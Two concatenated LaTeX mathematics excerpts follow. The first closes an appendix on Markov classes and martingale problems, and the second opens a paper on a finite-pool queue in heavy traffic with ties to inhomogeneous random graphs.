$(s,x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel.
\end{proposition}
\begin{proof}
We will only show the case in which $p$ is measurable in time since the other case is proven very similarly.
\\
We start by showing the statement for $f\in\mathcal{C}_b([0,T]\times E,\mathbbm{R})$. $X$ is cadlag
so $t\longmapsto f(t,X_t)$ also is. So for any fixed
$(s,x)\in[0,T]\times E$ if we take a converging sequence $t_n\underset{n\rightarrow\infty}{\longrightarrow} t^+ $(resp. $t^-$),
an easy application of the
Lebesgue dominated convergence theorem shows that
$t\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is cadlag.
On the other hand, by Proposition \ref{Borel}, for a fixed $t$, $(s,x)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel. Therefore by Theorem 15 Chapter IV of \cite{dellmeyer75}, $(s,x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is jointly Borel.
\\
In order to extend the result to any $f\in\mathcal{B}_b([0,T]\times E,\mathbbm{R})$, we consider the subset $\mathcal{I}$ of functions $f\in\mathcal{B}_b([0,T]\times E,\mathbbm{R})$ such that $(s,x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel. Then $\mathcal{I}$ is a linear space stable by uniform convergence and by monotone convergence and containing $\mathcal{C}_b([0,T]\times E,\mathbbm{R})$ which is stable by multiplication and generates the Borel $\sigma$-field $\mathcal{B}([0,T])\otimes \mathcal{B}(E)$. So by Theorem 21 in Chapter I of \cite{dellmeyer75}, $\mathcal{I}=\mathcal{B}_b([0,T]\times E,\mathbbm{R})$. This theorem is sometimes called the functional monotone class theorem.
\\
Now for any positive Borel function $f$, we can set $f_n = f\wedge n$ which is bounded Borel. Since by monotonic convergence, $\mathbbm{E}^{s,x}[f_n(t,X_t)]$ tends to $\mathbbm{E}^{s,x}[f(t,X_t)]$, then $(s,x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel as the pointwise limit of Borel functions. Finally for a general $f$ it is enough to decompose it into $f=f^+-f^-$ where $f^+,f^-$ are positive functions.
\end{proof}
\section{Technicalities concerning homogeneous Markov classes and martingale problems}\label{SC}
We start by introducing homogeneous Markov classes. In this section, we are given a Polish space $E$ and some $T\in\mathbbm{R}^*$.
\begin{notation}\label{HomogeneNonHomogene}
A mapping $\tilde{p}:E\times[0,T]\times\mathcal{B}(E)$ will be called a \textbf{homogeneous transition function} if
$p:(s,x,t,A)\longmapsto \tilde{p}(x,t-s,A)\mathds{1}_{s<t}+\mathds{1}_A(x)\mathds{1}_{s\geq t}$ is a transition function in the sense of Definition \ref{Defp}. This in particular implies $\tilde{p}=p(0,\cdot,\cdot,\cdot)$.
\\
A set of probability measures $(\mathbbm{P}^x)_{x\in E}$ on the canonical space associated to $T$ and $E$ (see Notation \ref{canonicalspace}) will be called a \textbf{homogeneous Markov class} associated to a homogeneous transition function $\tilde{p}$ if
\begin{equation}
\left\{\begin{array}{l}
\forall t\in[0,T]\quad \forall A\in\mathcal{B}(E)\quad ,\mathbbm{P}^{x}(X_t\in A)=\tilde{p}(x,t,A)\\
\forall 0\leq t\leq u\leq T\quad , \mathbbm{P}^x(X_u\in A|\mathcal{F}_t)=
\tilde p(X_t,u-t,A)\quad \mathbbm{P}^{s,x} \text{a.s.}
\end{array}\right.
\end{equation}
Given a homogeneous Markov class $(\mathbbm{P}^x)_{x\in E}$ associated to a homogeneous transition function $\tilde{p}$, one can always consider the Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ associated to the transition function
$p:(s,x,t,A)\longmapsto \tilde{p}(x,t-s,A)\mathds{1}_{s<t}+\mathds{1}_A(x)\mathds{1}_{s\geq t}$.
In particular, for any $x\in E$, we have $\mathbbm{P}^{0,x}=\mathbbm{P}^x$.
\end{notation}
We show that a homogeneous transition function necessarily produces a measurable in time non homogeneous transition function.
\begin{proposition}\label{HomoMeasurableint}
Let $\tilde{p}$ be a homogeneous transition function and let $p$ be the associated non homogeneous transition function as described in Notation \ref{HomogeneNonHomogene}. Then $p$ is measurable in time in the sense of Definition \ref{DefFoncTrans}.
\end{proposition}
\begin{proof}
Given that $p:(s,x,t,A)\longmapsto \tilde{p}(x,t-s,A)\mathds{1}_{s<t}+\mathds{1}_A(x)\mathds{1}_{s\geq t}$, it is actually enough to show that $\tilde{p}(\cdot,\cdot,A)$ is Borel for any $A\in\mathcal{B}(E)$. We can also write $ \tilde{p}=p(0,\cdot,\cdot,\cdot)$, so $p$ is measurable in time if $p(0,\cdot,\cdot,A)$ is Borel for any $A\in\mathcal{B}(E)$, and this holds thanks to Proposition \ref{measurableint} applied to $f:=\mathds{1}_A$ .
\end{proof}
We then introduce below the notion of homogeneous martingale problems.
\begin{definition}\label{MPhomogene}
Given $A$ an operator mapping a linear algebra $\mathcal{D}(A)\subset \mathcal{B}_b(E,\mathbbm{R})$ into
$\mathcal{B}_b(E,\mathbbm{R})$, we say that a set of probability measures $(\mathbbm{P}^x)_{x\in E}$ on the measurable space $(\Omega,\mathcal{F})$ (see Notation \ref{canonicalspace}) solves the \textbf{homogeneous Martingale Problem} associated to $(\mathcal{D}(A),A)$ if for any $x\in E$, $\mathbbm{P}^x$ satisfies
\begin{itemize}
\item for every $\phi\in\mathcal{D}(A)$, $\phi(X_{\cdot})-\int_0^{\cdot}A\phi(X_r)dr$ is a $(\mathbbm{P}^x,(\mathcal{F}_t)_{t\in[0,T]})$-local
martingale;
\item $\mathbbm{P}^x(X_0=x)=1$.
\end{itemize}
We say that this {\bf homogeneous Martingale Problem is well-posed} if for any $x\in E$, $\mathbbm{P}^x$ is the only probability measure on $(\Omega,\mathcal{F})$ verifying those two items.
\end{definition}
\begin{remark}
If $(\mathbbm{P}^x)_{x\in E}$ is a homogeneous Markov class solving the homogeneous Martingale Problem associated to some $(\mathcal{D}(A),A)$, then the corresponding $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ (see Notation \ref{HomogeneNonHomogene}) solves the Martingale Problem associated to $(\mathcal{D}(A),A,V_t\equiv t)$ in the sense of Definition \ref{MartingaleProblem}. Moreover if the homogeneous Martingale Problem is well-posed, so is the latter one.
\end{remark}
So a homogeneous Markov process solving a homogeneous martingale problem falls
into our setup. We will now see how we can pass from an operator $A$ which only
acts on time-independent functions to an evolution operator $\partial_t+A$,
and see how our Markov class still solves the corresponding martingale problem.
\begin{notation}\label{NotDomain}
Let $E$ be a Polish space and let $A$ be an operator mapping a linear algebra $\mathcal{D}(A)\subset \mathcal{B}_b(E,\mathbbm{R})$ into $\mathcal{B}_b(E,\mathbbm{R})$.
\\
If $\phi\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ is such that for every $t\in[0,T]$, $\phi(t,\cdot)\in\mathcal{D}(A)$, then $A\phi$ will denote the
mapping $(t,x)\longmapsto A(\phi(t,\cdot))(x)$.
\\
\\
We now introduce the time-inhomogeneous domain associated to $A$ which we denote $\mathcal{D}^{max}(\partial_t+A)$ and which consists in functions $\phi\in\mathcal{B}_b([0,T]\times E,\mathbbm{R})$ verifying the following conditions:
\begin{itemize}
\item $\forall x\in E$, $\phi(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$ and $\forall t\in[0,T]$, $\phi(t,\cdot)\in\mathcal{D}(A)$;
\item $\forall t\in[0,T]$, $\partial_t \phi(t,\cdot)\in\mathcal{D}(A)$ and $\forall x\in E$, $A\phi(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$;
\item $\partial_t\circ A\phi=A\circ\partial_t\phi$;
\item $\partial_t\phi$, $A\phi$ and $\partial_t\circ A\phi$ belong to $\mathcal{B}_b([0,T]\times E,\mathbbm{R})$.
\end{itemize}
On $\mathcal{D}^{max}(\partial_t+A)$ we will consider the operator $\partial_t+A$.
\end{notation}
\begin{remark}\label{RemDomain}
With these notations, it is clear that $\mathcal{D}^{max}(\partial_t+A)$ is a sub-linear space of $\mathcal{B}_b([0,T]\times E,\mathbbm{R})$. It is in general not a linear algebra, but always contains $\mathcal{D}(A)$, and even $\mathcal{C}^1([0,T],\mathbbm{R})\otimes\mathcal{D}(A)$, the linear algebra of functions which can be written $\underset{k\leq N}{\sum}\lambda_k\psi_k\phi_k$ where $N\in\mathbbm{N}$, and for any $k$, $\lambda_k\in\mathbbm{R}$, $\psi_k\in\mathcal{C}^1([0,T],\mathbbm{R})$, $\phi_k\in\mathcal{D}(A)$. We also notice that $\partial_t+A$ maps $\mathcal{D}^{max}(\partial_t+A)$ into $\mathcal{B}_b([0,T]\times E,\mathbbm{R})$.
\end{remark}
\begin{lemma}\label{LemDomain}
Let us consider the same notations and under the same assumptions as
in Notation \ref{NotDomain}. Let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ be a Markov class solving the well-posed Martingale Problem associated to $(A,\mathcal{D}(A),V_t\equiv t)$ in the sense of Definition \ref{MartingaleProblem}. Then it also solves the well-posed martingale problem associated to
$(\partial_t+A,\mathcal{A},V_t\equiv t)$ for any linear algebra $\mathcal{A}$ included in $\mathcal{D}^{max}(\partial_t+A)$.
\end{lemma}
\begin{proof}
We start by noticing that since $\mathcal{D}(A)\subset \mathcal{B}_b(E,\mathbbm{R})$ and is mapped into $\mathcal{B}_b(E,\mathbbm{R})$, then for any $(s,x)\in[0,T]\times E$ and $\phi\in\mathcal{D}(A)$, $M^{s,x}[\phi]$ is bounded and is therefore a martingale.
\\
\\
We fix $(s,x)\in[0,T]\times E$, $\phi\in\mathcal{D}^{max}(\partial_t+A)$ and $s\leq t\leq u\leq T$ and we will show that
\begin{equation}\label{eqDomain}
\mathbbm{E}^{s,x}\left[\phi(u,X_u)-\phi(t,X_t)-\int_t^u(\partial_t+A)\phi(r,X_r)dr\middle|\mathcal{F}_t\right]=0,
\end{equation}
which implies that $\phi(\cdot,X_{\cdot})-\int_s^{\cdot}(\partial_t+A)\phi(r,X_r)dr$, $t\in[s,T]$ is a $\mathbbm{P}^{s,x}$-martingale.
We have
\begin{equation*}
\begin{array}{rcl}
&&\mathbbm{E}^{s,x}[\phi(u,X_u)-\phi(t,X_t)|\mathcal{F}_t]\\
&=&\mathbbm{E}^{s,x}[(\phi(u,X_t)-\phi(t,X_t))+(\phi(u,X_u)-\phi(u,X_t))|\mathcal{F}_t]\\
&=&\mathbbm{E}^{s,x}\left[\int_t^u\partial_t\phi(r,X_t)dr+\left(\int_t^uA\phi(u,X_r)dr+(M^{s,x}[\phi(u,\cdot)]_u-M^{s,x}[\phi(u,\cdot)]_t)\right)|\mathcal{F}_t\right]\\
&=&\mathbbm{E}^{s,x}\left[\int_t^u\partial_t\phi(r,X_t)dr+\int_t^uA\phi(u,X_r)dr|\mathcal{F}_t\right] \\
&=& I_0 - I_1 + I_2,
\end{array}
\end{equation*}
where $I_0 = \mathbbm{E}^{s,x}\left[\int_t^u\partial_t\phi(r,X_r)dr+\int_t^uA\phi(r,X_r)dr|\mathcal{F}_t\right]$; $I_1 =\mathbbm{E}^{s,x}\left[\int_t^u(\partial_t\phi(r,X_r)-\partial_t\phi(r,X_t))dr|\mathcal{F}_t\right]$ $I_2 =\mathbbm{E}^{s,x}\left[\int_t^u(A\phi(u,X_r)-A\phi(r,X_r))dr|\mathcal{F}_t\right]$.
\eqref{eqDomain} will be established
if one proves that $I_1 = I_2$. We do this below.
\\
At fixed $r$ and $\omega$, $v\longmapsto A\phi(v,X_r(\omega))$ is $\mathcal{C}^1$, therefore
$A\phi(u,X_r(\omega))-A\phi(r,X_r(\omega))=\int_r^u\partial_tA\phi(v,X_r(\omega))dv$ and
$I_2= \mathbbm{E}^{s,x}\left[\int_t^u\int_r^u\partial_tA\phi(v,X_r)dvdr|\mathcal{F}_t\right]$. Then
$ I_1=\mathbbm{E}^{s,x}\left[\int_t^u\int_t^rA\partial_t\phi(r,X_v)dvdr|\mathcal{F}_t\right]+\mathbbm{E}^{s,x}
\left[\int_t^u(M^{s,x}[\partial_t\phi(r,\cdot)]_r-M^{s,x}[\partial_t\phi(r,\cdot)]_t)dr|\mathcal{F}_t \right].$
\\
Since $\partial_t\phi$ and $A\partial_t\phi$ are bounded, $M^{s,x}[\partial_t\phi(r,\cdot)]_r(\omega)$ is uniformly bounded in $(r,\omega)$, so by Fubini's theorem for conditional expectations we have
\begin{equation}
\begin{array}{rcl}
&&\mathbbm{E}^{s,x}[\int_t^u(M^{s,x}[\partial_t\phi(r,\cdot)]_r-M^{s,x}[\partial_t\phi(r,\cdot)]_t)dr|\mathcal{F}_t]\\
&=&\int_t^u\mathbbm{E}^{s,x}[M^{s,x}[\partial_t\phi(r,\cdot)]_r-M^{s,x}[\partial_t\phi(r,\cdot)]_t|\mathcal{F}_t]dr\\
&=&0.
\end{array}
\end{equation}
Finally since $\partial_tA\phi=A\partial_t\phi$ and again by Fubini's theorem for conditional expectations, we have $\mathbbm{E}^{s,x}\left[\int_t^u\int_r^u\partial_tA\phi(v,X_r)dvdr|\mathcal{F}_t\right]=\mathbbm{E}^{s,x}\left[\int_t^u\int_t^rA\partial_t\phi(r,X_v)dvdr|\mathcal{F}_t\right]$ so $I_1=I_2$ which concludes the proof.
\end{proof}
In conclusion we can state the following.
\begin{corollary}\label{conclusionA4}
Given a homogeneous Markov class $(\mathbbm{P}^x)_{x\in E}$ solving a well-posed homogeneous Martingale Problem associated to some $(\mathcal{D}(A),A)$,
there exists a Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ which transition function is measurable in time and such that for any algebra $\mathcal{A}$ included in $\mathcal{D}^{max}(\partial_t+A)$, $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ solves the well-posed Martingale Problem associated to $(\partial_t+A,\mathcal{A},V_t\equiv t)$ in the sense of Definition \ref{MartingaleProblem}.
\end{corollary}
\end{appendices}
\bibliographystyle{plain}
| 2024-02-18T23:40:17.828Z | 2017-04-13T02:04:52.000Z | algebraic_stack_train_0000 | 1,969 | 23,339 |
|
proofpile-arXiv_065-9679 | \section{Introduction} \label{sec:introduction}
This paper introduces the $\DGa$ queue that models a situation in which only a finite pool of $n$ customers will join the queue. These $n$ customers are triggered to join the queue after independent exponential times, but the rates of their exponential clocks depend on their service requirements. When a customer requires $S$ units of service, its exponential clock rings after an exponential time with mean $S^{-\alpha}$ with $\alpha\in[0,1]$. Depending on the value of the free parameter $\alpha$, the arrival times are i.i.d.~($\alpha = 0$) or decrease with the service requirement ($\alpha\in(0,1]$). The queue is attended by a single server that starts working at time zero, works at unit speed, and serves the customers in order of arrival. At time zero, we allow for the possibility that $i$ of the $n$ customers have already joined the queue, waiting for service. We will take $i\ll n$, so that without loss of generality we can assume that at time zero there are still $n$ customers waiting for service. These initial customers are numbered $1, \ldots, i$ and the customers that arrive later are numbered $i + 1, i + 2,\ldots$ in order of arrival. Let $A(k)$ denote the number of customers arriving during the service time of the $k$-th customer. The busy periods of this queue will then be completely characterized by the initial number of customers $i$ and the random variables $\left(A(k)\right)_{k\geq 1}$. Note that the random variables $\left(A(k)\right)_{k\geq 1}$ are not i.i.d.~due to the finite-pool effect and the service-dependent arrival rates. We will model and analyze this queue using the queue-length process embedded at service completions.
We consider the $\DGa$ queue in the large-system limit $n\to\infty$, while imposing at the same time a heavy-traffic regime that will stimulate the occurrence of a substantial first busy period. By substantial we mean that the server can work without idling for quite a while, not only serving the initial customers but also those arriving somewhat later. For this regime we show that the embedded queue-length process converges to a Brownian motion with negative quadratic drift. For the case $\alpha = 0$, referred to as the $\smash{\Delta_{(i)}/G/1}$ queue with i.i.d.~arrivals \cite{honnappa2015delta, honnappa2014transitory}, a similar regime was studied in \cite{bet2014heavy}, while for $\alpha = 1$ it is closely related to the critical inhomogeneous random graph studied in \cite{bhamidi2010scaling,Jose10}.
While the queueing process consists of alternating busy periods and idle periods, in the $\DGa$ queue we naturally focus on the first busy period. After some time, the activity in the queue inevitably becomes negligible. The early phases of the process are therefore of primary interest, when the head start provided by the initial customers still matters and when the rate of newly arriving customers is still relatively high. The head start and strong influx together lead to a substantial first busy period, and essentially determine the relevant time of operation of the system.
We also consider the structural properties of the first busy period in terms of a random graph.
Let the random variable $H(i)$ denote the number of customers served in the first busy period, starting with $i$ initial customers. We then associate a (directed) random graph to the queueing process as follows. Say $H(i) = N$ and consider a graph with vertex set $\{1, 2,\ldots,N\}$ and in which two vertices $r$ and $s$ are joined by an edge if and only if the $r$-th customer arrives during the service time of the $s$-th customer. If $i = 1$, then the graph is a rooted tree with $N$ labeled vertices, the root being labeled 1. If $i > 1$, then the graph is a forest consisting of $i$ distinct rooted trees whose roots are labeled $1,\ldots,i$, respectively. The total number of vertices in the forest is $N$.
This random forest is exemplary for a deep relation between queues and random graphs, perhaps best explained by
interpreting the embedded $\DGa$ queue as an \emph{exploration process}, a generalization of a branching process that can account for dependent random variables $\left(A(k)\right)_{k\geq 1}$. Exploration processes arose in the context of random graphs as a recursive algorithm to investigate questions concerning the size and structure of the largest components \cite{Aldo97}. For a given random graph, the exploration process declares vertices active, neutral or inactive. Initially, only one vertex is active and all others are neutral. At each time step one active vertex (e.g. the one with the smallest index) is explored, and it is declared inactive afterwards. When one vertex is explored, its neutral neighbors become active for the next time step. As time progresses, and more vertices are already explored (inactive) or discovered (active), fewer vertices are neutral. This phenomenon is known as the \emph{depletion-of-points effect} and plays an important role in the scaling limit of the random graph. Let $A(k)$ denote the neutral neighbors of the $k$-th explored vertex. The exploration process then has increments $\left(A(k)\right)_{k\geq 1}$ that each have a different distribution. The exploration process encodes useful information about the underlying random graph. For example, excursions above past minima are the sizes of the connected components. The critical behavior of random graphs connected with the emergence of a giant component has received tremendous attention \cite{ addario2012continuum,bhamidi2014augumented,bhamidi2010scaling,BhaHofLee09b,
dhara2016critical, dhara2016heavy, Jose10, hofstad2010critical, hofstad2016mesoscopic}. Interpreting active vertices as being in a queue, and vertices being explored as customers being served, we see that the exploration process and the (embedded) $\DGa$ queue driven by $\left(A(k)\right)_{k\geq 1}$ are identical.
The analysis of the $\DGa$ queue and associated random forest is challenging because the random variables $\left(A(k)\right)_{k\geq 1}$ are not i.i.d. In the case of i.i.d.~$\left(A(k)\right)_{k\geq 1}$, there exists an even deeper connection between queues and random graphs, established via branching processes instead of exploration processes \cite{kendall1951some}. To see this, declare the initial customers in the queue to be the $0$-th generation. The customers (if any) arriving during the total service time of the initial $i$ customers form the $1$-st generation, and the customers (if any) arriving during the total service time of the customers in generation $t$ form generation $t+1$ for $t \geq 1$. Note that the total progeny of this Galton-Watson branching process has the same distribution as the random variable $H(i)$ in the queueing process. Through this connection, properties of branching processes can be carried over to the queueing processes and associated random graphs \cite{duquesne2002random, legall2005random,limic2001lifo,takacs1988queues,takacs1993limit,takacs1995queueing}. Tak\'acs \cite{takacs1988queues,takacs1993limit,takacs1995queueing} proved several limit theorems for the case of i.i.d.~$\left(A(k)\right)_{k\geq 1}$, in which case the queue-length process and derivatives such as the first busy period weakly converge to (functionals of) the Brownian excursion process. In that classical line, the present paper can be viewed as an extension to exploration processes with more complicated dependency structures in $\left(A(k)\right)_{k\geq 1}$.
In Section \ref{sec:model_description} we describe the $\DGa$ queue and associated graphs in more detail and present our main results. The proof of the main theorem, the stochastic-process limit for the queue-length process in the large-pool heavy-traffic regime, is presented in Sections \ref{sec:overview_proof} and \ref{sec:proof_main_result}. Section \ref{sec:conclusion} discusses some interesting questions related to the $\DGa$ queue and associated random graphs that are left open.
\section{Model description} \label{sec:model_description}
We consider a sequence of queueing systems, each with a finite (but growing) number $n$ of potential customers labelled with indices $i\in[n]:=\{1,\ldots, n\}$. Customers have i.i.d.~service requirements with distribution $F_{\scriptscriptstyle S}(\cdot)$. We denote with $S_i$ the service requirement of customer $i$ and with $S$ a generic random value, and $S_i$ and $S$ all have distribution $F_{\scriptscriptstyle S}(\cdot)$. In order to obtain meaningful limits as the system grows large, we scale the service speed by $n/(1+\beta n^{-1/3})$ with $\beta\in\mathbb R$ so that the service time of customer $i$ is given by
\begin{equation}
\tilde S_i = \frac{S_i(1+\beta n^{-1/3})}{n}.
\end{equation}%
We further assume that $\mathbb E[{S}^{2+\alpha}]<\infty$.
If the service requirement of customer $i$ is $S_i$, then, conditioned on $S_i$, its arrival time $T_i$ is assumed to be exponentially distributed with mean $1/(\lambda S_i^{\alpha})$, with $\alpha\in[0,1]$ and $\lambda>0$. Hence
\begin{equation}\label{eq:arrival_times}%
T_i\stackrel{\mathrm{d}}{=}\mathrm{Exp}_i(\lambda S_i^{\alpha})
\end{equation}%
with $\stackrel{\mathrm{d}}{=}$ denoting equality in distribution and $\mathrm{Exp}_i(c)$ an exponential random variable with mean $1/c$ independent across $i$. Note that {conditionally on the service times}, the arrival times are independent (but not identically distributed). We introduce $c(1), c(2), \ldots, c(n)$ as the indices of the customers in order of arrival, so that $T_{c(1)} \leq T_{c(2)}\leq T_{c(3)}\leq\ldots$ almost surely.
We will study the queueing system in heavy traffic, in a similar heavy-traffic regime as in \cite{bet2014heavy, bet2015finite}. The initial traffic intensity $\rho_n$ is kept close to one by imposing the relation
\begin{equation}\label{eq:crit}%
\rho_n := \lambda_n \mathbb{E}[S^{1+\alpha}](1+\beta n^{-1/3}) = 1+\beta n^{-1/3} + o_{\mathbb P}(n^{-1/3}),
\end{equation}%
where $\lambda = \lambda_n$ can depend on $n$ and $f_n = o_{\mathbb P}(n^{-1/3})$ is such that $\lim_{n\rightarrow\infty} f_nn^{1/3}\sr{\mathbb P}{\rightarrow} 0$. The parameter $\beta$ then determines the position of the system inside the critical window: the traffic intensity is greater than one for $\beta>0$, so that the system is initially overloaded, while the system is initially underloaded for $\beta<0$.
Our main object of study is the queue-length process embedded at service completions, given by $Q_n(0) = i$ and
\begin{align}\label{eq:queue_length_process}%
Q_n(k) &= (Q_n(k-1) + A_n(k)-1)^+,
\end{align}%
with $x^+ = \max\{0,x\}$ and $A_n(k)$ the number of arrivals during the $k$-th service given by
\begin{equation}\label{eq:number_arrivals_during_one_service}
A_n(k) = \sum_{i\notin\nu_{k}}\mathds{1}_{\{T_{i}\leq \tilde S _{c(k)}\}}
\end{equation}
where $\nu_{k}\subseteq[n]$ denotes the set of customers who have been served or are in the queue at the start of the $k$-th service. Note that
\begin{equation}\label{eq:cardinality_nu}%
\vert \nu_{k} \vert = (k-1) + Q_n(k-1) + 1 = k + Q_n(k-1).
\end{equation}%
Given a process $t\mapsto X(t)$, we define its \emph{reflected version} through the reflection map $\phi(\cdot)$ as
\begin{equation}%
\phi(X)(t) := X(t) - \inf_{s\leq t} X(s)^-.
\end{equation}%
The process $Q_n(\cdot)$ can alternatively be represented as the reflected version of a certain process $N_n(\cdot)$, that is
\begin{equation}\label{eq:queue_length_process_reflected}%
Q_n(k) = \phi (N_n)(k),
\end{equation}%
where $N_n(\cdot)$ is given by $N_n(0)=i$ and
\begin{align}\label{eq:pre_reflection_queue_length_process}%
N_n(k)&=N_n(k-1)+A_n(k)-1.
\end{align}%
We assume that whenever the server finishes processing one customer, and the queue is empty,
the customer to be placed into service is chosen according to the following size-biased distribution:
\begin{align}\label{eq:choice_of_customer_when_queue_is_empty}%
\mathbb P (\mathrm{customer}~j~\mathrm{is~placed~in~service}\mid \nu_{i-1}) = \frac{S_j^{\alpha}}{\sum_{l\notin \nu_{i-1}}S_l^{\alpha}},\qquad j\notin\nu_{i-1},
\end{align}%
where we tacitly assumed that customer $j$ is the $i$-th customer to be served. \bl{With definitions \eqref{eq:number_arrivals_during_one_service} and \eqref{eq:choice_of_customer_when_queue_is_empty}, the process \eqref{eq:queue_length_process} describes the $\DGa$ queue with exponential arrivals \eqref{eq:arrival_times}, embedded at service completions. }
\begin{remark}[A directed random tree] \label{rem:directed_random_tree_model} The embedded queueing process \eqref{eq:queue_length_process} and \eqref{eq:queue_length_process_reflected} gives rise to a certain directed rooted tree. To see this, associate a vertex $i$ to customer $i$ and let $c(1)$ be the root. Then, draw a directed edge to $c(1)$ from $c(2),\ldots, c(A_n(1)+1)$ so to all customers who joined during the service time of $c(1)$. Then, draw an edge from all customers who joined during the service time of $c(2)$ to $c(2)$, and so on. This procedure draws a directed edge from $c(i)$ to $c(i + \sum_{j=1}^{i-1}A_n(j)),\ldots,c(i + \sum_{j=1}^{i}A_n(j) )$ if $A_n(i) \geq 1$. The procedure stops when the queue is empty and there are no more customers to serve. When $Q_n(0) = i = 1$ (resp.~$i\geq 2$), this gives a random directed rooted tree (resp.~forest). The degree of vertex $c(i)$ is $1 + \vert A_n(i)\vert$ and the total number of vertices in the tree (resp.~forest) is given by
\begin{equation}
H_{Q_n}(0) = \inf\{k\geq0:Q_n(k)=0\},
\end{equation}
the hitting time of zero of the process $Q_n(\cdot)$.
\end{remark}
\begin{remark}[An inhomogeneous random graph] If $\alpha = 1$, the random tree constructed in Remark \ref{rem:directed_random_tree_model} is distributionally equivalent to the tree spanned by the exploration process of an inhomogeneous random graph. Let us elaborate on this. An inhomogeneous random graph is a set of vertices $\{i:i\in[n]\}$ with (possibly random) weights $(\mathcal W_i)_{i\in[n]}$ and edges between them. In a \emph{rank-1 inhomogeneous random graph}, given $(\mathcal W_i)_{i\in[n]}$, $i$ and $j$ share an edge with probability
\begin{equation}%
p_{i\leftrightarrow j} := 1- \exp\Big(-\frac{\mathcal W_i\mathcal W_j}{\sum_{i\in[n]}\mathcal W_i}\Big).
\end{equation}%
The tree constructed from the $\smash{\Delta\!%
\begin{smallmatrix}
\!1 \\
(i)
\end{smallmatrix}/G/1}$ queue then corresponds to the exploration process of a rank-1 inhomogeneous random graph, defined as follows. Start with a first arbitrary vertex and reveal all its neighbors. Then the first vertex is discarded and the process moves to a neighbor of the first vertex, and reveals its neighbors. This process continues by exploring the neighbors of each revealed vertex, in order of appearance. By interpreting each vertex as a different customer, this exploration process can be coupled to a $\smash{\Delta\!%
\begin{smallmatrix}
\!1 \\
(i)
\end{smallmatrix}/G/1}$ queue, for a specific choice of $(\mathcal W_i)_{i=1}^n$ and $\lambda_n$. Indeed, when $\mathcal W_i = (1+\beta n^{-1/3})S_i$ for $i=1,\ldots, n$, the probability that $i$ and $j$ are connected is given by
\begin{align}%
p_{j\leftrightarrow i} &= 1 - \exp\Big( -(1+\beta n^{-1/3})\frac{S_i}{n}\frac{ S_j}{\sum_{l\in[n]}S_l/n}\Big) \notag\\
&= 1 - \exp\Big( -\tilde{S}_iS_j\frac{n}{\sum_{i\in[n]}S_i}\Big)\notag\\
&=\mathbb P(T_j\leq \tilde S_i\vert (S_i)_{j\in[n]}),
\end{align}%
where
\begin{equation}%
T_j \sim \exp (\lambda_n),
\end{equation}%
and $\lambda_n = {n}/\sum_{i\in[n]} S_i$.
The rank-1 inhomogeneous random graph with weights $(S_i)_{i=1}^n$ is said to be \emph{critical} (see \cite[(1.13)]{bhamidi2010scaling}) if
\begin{equation}\label{eq:crit_inhomogeneous}%
\frac{\sum_{i\in[n]}S_i^2}{\sum_{i\in[n]}S_i}=\frac{\mathbb E[S^2]}{\mathbb E[S]} + o_{\mathbb P}(n^{-1/3})= 1 + o_{\mathbb P}(n^{-1/3}).
\end{equation}%
Consequently, if $\beta=0$ and $\lambda_n = n/\sum_{i\in[n]}S_i$, the heavy-traffic condition \eqref{eq:crit} for the $\smash{\Delta\!%
\begin{smallmatrix}
\!1 \\
(i)
\end{smallmatrix}/G/1}$ queue implies the criticality condition \eqref{eq:crit_inhomogeneous} for the associated random graph (and vice versa).
\end{remark}
\begin{remark}[Results for the queue-length process]\label{rem:results_queue_length_process}
\bl{By definition, the embedded queue \eqref{eq:queue_length_process} neglects the idle time of the server.} Via a time-change argument it is possible to prove that, in the limit, the (cumulative) idle time is negligible and the embedded queue is arbitrarily close to the queue-length process uniformly over compact intervals. This has been proven for the $\smash{\Delta_{(i)}/G/1}$ queue in \cite{bet2014heavy}, and the techniques developed there can be extended to the $\DGa$ queue without additional difficulties.
\end{remark}
\subsection{The scaling limit of the embedded queue}
All the processes we consider are elements of the space $\mathcal D := \mathcal D([0,\infty))$ of c\`adl\`ag functions that admit left limits and are continuous from the right. To simplify notation, for a discrete-time process $X(\cdot):\mathbb N \rightarrow\mathbb R$, we write $X(t)$, with $t\in[0,\infty)$, instead of $X(\lfloor t\rfloor)$. Note that a process defined in this way has c\`adl\`ag paths. The space $\mathcal D$ is endowed with the usual Skorokhod $J_1$ topology. We then say that a process converges in distribution in $(\mathcal D, J_1)$ when it converges as a random measure on the space $\mathcal D$, when this is endowed with the $J_1$ topology.
{We are now able to state our main result. Recall that $Q_n(\cdot)$ is the embedded queue-length process of the $\DGa$ queue and let
\begin{equation}\label{def:rescaled_Q}
\mathbf{Q}_n(t) := n^{-1/3} Q_n(tn^{2/3})
\end{equation}%
be the diffusion-scaled queue-length process.
\begin{theorem}[Scaling limit for the $\DGa$ queue]\label{th:main_theorem_delta_G_1}
Assume that $\alpha\in[0,1]$, $\mathbb E[S^{2+\alpha}]<\infty$ and that the heavy-traffic condition \eqref{eq:crit} holds. Assume further that $\mathbf{Q}_n(0) = q $. Then, as $n\rightarrow\infty$,
\begin{equation}\label{eq:main_theorem_delta_G_1_conclusion}%
\mathbf Q_n( \cdot )\stackrel{\mathrm{d}}{\rightarrow} \phi(W)( \cdot )\qquad \mathrm{in}~(\mathcal D, J_1),
\end{equation}%
where $W(\cdot)$ is the diffusion process
\begin{equation}\label{eq:main_theorem_delta_G_1_diffusion_definition}%
W(t)= q + \beta t - \lambda\frac{\mathbb E[S^{1+2\alpha}]}{2\mathbb E[S^{\alpha}]}t^2 + \sigma B(t),
\end{equation}%
with $\sigma^2 = \lambda^2 \mathbb E[S^{\alpha}]\mathbb E[S^{2+\alpha}]$ and $B(\cdot)$ is a standard Brownian motion.
\end{theorem}
